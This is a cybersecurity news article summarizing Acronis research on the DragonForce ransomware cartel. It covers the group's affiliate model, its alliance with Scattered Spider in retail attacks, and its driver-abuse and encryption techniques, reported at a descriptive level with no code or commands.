Acronis researchers uncover the growing reach of DragonForce, a Conti-based ransomware cartel that is reshaping cybercrime through affiliate collaboration and advanced attack tactics.
Quick Summary – TLDR:
- DragonForce rebranded as a ransomware cartel, offering affiliates infrastructure, profit-sharing and branding freedom.
- Scattered Spider joined the cartel, enabling high-profile attacks including one on Marks & Spencer.
- The cartel uses vulnerable drivers (BYOVD) to kill security software and encrypt systems undetected.
- Over 200 victims have been exposed, highlighting DragonForce’s rising dominance in the ransomware ecosystem.
What Happened?
DragonForce, a ransomware group that emerged in 2023, has rebranded itself as a cartel in early 2025, moving beyond traditional Ransomware-as-a-Service (RaaS) operations. This new model offers affiliates profit incentives, infrastructure support and full control over branding, while forming alliances with notorious cybercriminals like Scattered Spider. The combined threat has already impacted major enterprises including Marks & Spencer and Harrods.
🚨NEW: Acronis Threat Research Unit (TRU) analyzed recent activity linked to the DragonForce ransomware group and identified a new malware variant in the wild.
— Acronis (@Acronis) November 4, 2025
Active since 2023, DragonForce, a Conti-derived ransomware-as-a-service, has rebranded into a ransomware cartel,… pic.twitter.com/DL6lWimq7m
The Rise of DragonForce
DragonForce began as a typical RaaS group using leaked LockBit 3.0 and Conti v3 source code to create its ransomware payloads. However, what sets DragonForce apart is its strategic shift to a cartel-style model, recruiting affiliates with attractive offers like 80 percent of the ransom profits, custom encryptors and access to its leak infrastructure.
Affiliates are allowed to white-label payloads and run operations under their own branding. This has led to the emergence of variants like Devman and Mamona (later renamed Global), both of which use DragonForce’s builder tools but apply unique configurations and file extensions.
Alliance with Scattered Spider
One of the group’s most notable moves has been its collaboration with Scattered Spider, a highly skilled access broker known for phishing, SIM swapping and multi-factor authentication (MFA) bypass techniques. Together, they orchestrated attacks on high-profile targets, such as UK retailer Marks & Spencer.
Scattered Spider uses sophisticated social engineering methods including:
- Reconnaissance on employee roles and access levels.
- Phishing and vishing to gain login credentials.
- SIM swapping and MFA fatigue to bypass authentication.
- Deployment of remote monitoring tools like TeamViewer and AnyDesk.
- Use of AWS Systems Manager Inventory for deeper network exploration.
Once inside, they provide access for DragonForce to deploy ransomware across Windows, Linux and ESXi systems, leading to full-scale data encryption and extortion.
Technical Power: BYOVD Attacks and Encryption
DragonForce distinguishes itself with advanced techniques like Bring Your Own Vulnerable Driver (BYOVD) attacks. By leveraging drivers such as truesight.sys and rentdrv2.sys, it can kill EDR and antivirus software, making detection and response nearly impossible.
Its ransomware uses the ChaCha20 encryption algorithm, generating a unique key for every file and encrypting it with RSA, mimicking core behavior from the original Conti source code. DragonForce added encrypted configuration files to hide parameters and reduce forensic visibility.
Key features include:
- Full, partial and header-only encryption modes.
- File extension customization.
- Targeted process termination (including SQL, Outlook, antivirus apps).
- Obfuscation using ADVObfuscator (although with occasional plaintext leakage).
Following public exposure of vulnerabilities in Akira’s encryption via Habr, DragonForce quickly patched its own code to avoid similar scrutiny. This adaptability shows its focus on maintaining technical superiority and operational security.
The Cartel’s Expansion and Power Plays
DragonForce has moved aggressively to establish dominance, including:
- Defacing rival ransomware sites, such as BlackLock.
- Attempting a hostile takeover of RansomHub infrastructure.
- Attracting fleeing affiliates from competing groups.
Over 200 victims have appeared on DragonForce’s leak site since late 2023, across industries like retail, airlines, insurance and managed service providers. This surge is a direct result of their cartel-like expansion model and growing affiliate base.
SQ Magazine Takeaway
I think DragonForce’s move from a typical ransomware group to a cartel is one of the boldest plays we’ve seen in recent cybercrime. They’re not just building malware; they’re building a franchise. By giving affiliates powerful tools and the freedom to brand themselves, DragonForce is creating a cybercrime “ecosystem” that’s scalable, hard to trace and incredibly dangerous. Add in Scattered Spider’s surgical precision in gaining access, and this alliance becomes a serious threat to global cybersecurity. If companies aren’t stepping up their defenses now, they’re already behind.
